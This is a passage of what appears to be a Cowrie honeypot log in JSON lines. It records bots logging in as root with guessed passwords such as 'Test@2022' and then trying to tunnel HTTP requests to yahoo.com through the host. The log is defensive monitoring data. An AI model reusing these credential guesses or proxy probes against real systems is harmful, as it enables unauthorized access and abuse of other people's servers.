lgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:17.344005Z","src_ip":"213.209.150.239","session":"c808a4edcbff"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":46804,"dst_ip":"1.2.3.4","dst_port":23,"session":"47881ef4aee9","protocol":"telnet","message":"New connection: 79.124.8.120:46804 (1.2.3.4:23) [session: 47881ef4aee9]","sensor":"my-vps","timestamp":"2025-08-26T00:59:17.354243Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:17.394212Z","src_ip":"79.124.8.120","session":"47881ef4aee9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:59:17.455914Z","src_ip":"79.124.8.120","session":"47881ef4aee9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:17.599663Z","src_ip":"213.209.150.239","session":"c808a4edcbff"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":15707,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:15707","sensor":"my-vps","timestamp":"2025-08-26T00:59:17.647766Z","session":"c808a4edcbff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:17.695109Z","src_ip":"213.209.150.239","session":"c808a4edcbff"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":30664,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:30664","sensor":"my-vps","timestamp":"2025-08-26T00:59:17.829542Z","session":"c808a4edcbff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:17.876973Z","src_ip":"213.209.150.239","session":"c808a4edcbff"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:17.924794Z","src_ip":"213.209.150.239","session":"c808a4edcbff"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3745,"dst_ip":"1.2.3.4","dst_port":22,"session":"d720dab88b56","protocol":"ssh","message":"New connection: 213.209.150.239:3745 (1.2.3.4:22) [session: d720dab88b56]","sensor":"my-vps","timestamp":"2025-08-26T00:59:17.971047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:17.971735Z","src_ip":"213.209.150.239","session":"d720dab88b56"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:18.018851Z","src_ip":"213.209.150.239","session":"d720dab88b56"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:18.254101Z","src_ip":"213.209.150.239","session":"d720dab88b56"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":7448,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:7448","sensor":"my-vps","timestamp":"2025-08-26T00:59:18.302308Z","session":"d720dab88b56"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:18.349712Z","src_ip":"213.209.150.239","session":"d720dab88b56"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":25784,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:25784","sensor":"my-vps","timestamp":"2025-08-26T00:59:18.485513Z","session":"d720dab88b56"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:18.533478Z","src_ip":"213.209.150.239","session":"d720dab88b56"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:18.581679Z","src_ip":"213.209.150.239","session":"d720dab88b56"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3794,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0f7f6dfa285","protocol":"ssh","message":"New connection: 213.209.150.239:3794 (1.2.3.4:22) [session: b0f7f6dfa285]","sensor":"my-vps","timestamp":"2025-08-26T00:59:18.627740Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:18.628536Z","src_ip":"213.209.150.239","session":"b0f7f6dfa285"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:18.675668Z","src_ip":"213.209.150.239","session":"b0f7f6dfa285"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:18.910256Z","src_ip":"213.209.150.239","session":"b0f7f6dfa285"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":26676,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:26676","sensor":"my-vps","timestamp":"2025-08-26T00:59:18.958280Z","session":"b0f7f6dfa285"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:19.005919Z","src_ip":"213.209.150.239","session":"b0f7f6dfa285"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":2507,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:2507","sensor":"my-vps","timestamp":"2025-08-26T00:59:19.141429Z","session":"b0f7f6dfa285"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:19.188557Z","src_ip":"213.209.150.239","session":"b0f7f6dfa285"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:19.236555Z","src_ip":"213.209.150.239","session":"b0f7f6dfa285"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3837,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1d56c9c4b41","protocol":"ssh","message":"New connection: 213.209.150.239:3837 (1.2.3.4:22) [session: a1d56c9c4b41]","sensor":"my-vps","timestamp":"2025-08-26T00:59:19.292639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:19.293521Z","src_ip":"213.209.150.239","session":"a1d56c9c4b41"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:19.350258Z","src_ip":"213.209.150.239","session":"a1d56c9c4b41"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:19.633653Z","src_ip":"213.209.150.239","session":"a1d56c9c4b41"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":15522,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:15522","sensor":"my-vps","timestamp":"2025-08-26T00:59:19.691644Z","session":"a1d56c9c4b41"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:19.748725Z","src_ip":"213.209.150.239","session":"a1d56c9c4b41"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":9126,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:9126","sensor":"my-vps","timestamp":"2025-08-26T00:59:19.902984Z","session":"a1d56c9c4b41"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:19.959574Z","src_ip":"213.209.150.239","session":"a1d56c9c4b41"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:20.016993Z","src_ip":"213.209.150.239","session":"a1d56c9c4b41"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3899,"dst_ip":"1.2.3.4","dst_port":22,"session":"472dedb62f23","protocol":"ssh","message":"New connection: 213.209.150.239:3899 (1.2.3.4:22) [session: 472dedb62f23]","sensor":"my-vps","timestamp":"2025-08-26T00:59:20.072585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:20.073709Z","src_ip":"213.209.150.239","session":"472dedb62f23"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:20.130370Z","src_ip":"213.209.150.239","session":"472dedb62f23"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:20.412530Z","src_ip":"213.209.150.239","session":"472dedb62f23"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":25688,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:25688","sensor":"my-vps","timestamp":"2025-08-26T00:59:20.470112Z","session":"472dedb62f23"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:20.526932Z","src_ip":"213.209.150.239","session":"472dedb62f23"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":13590,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:13590","sensor":"my-vps","timestamp":"2025-08-26T00:59:20.683130Z","session":"472dedb62f23"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:20.739750Z","src_ip":"213.209.150.239","session":"472dedb62f23"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:20.797294Z","src_ip":"213.209.150.239","session":"472dedb62f23"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4009,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec7c5c2ad194","protocol":"ssh","message":"New connection: 213.209.150.239:4009 (1.2.3.4:22) [session: ec7c5c2ad194]","sensor":"my-vps","timestamp":"2025-08-26T00:59:20.843637Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:20.844779Z","src_ip":"213.209.150.239","session":"ec7c5c2ad194"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:20.892157Z","src_ip":"213.209.150.239","session":"ec7c5c2ad194"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:21.127750Z","src_ip":"213.209.150.239","session":"ec7c5c2ad194"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":10917,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:10917","sensor":"my-vps","timestamp":"2025-08-26T00:59:21.175904Z","session":"ec7c5c2ad194"}
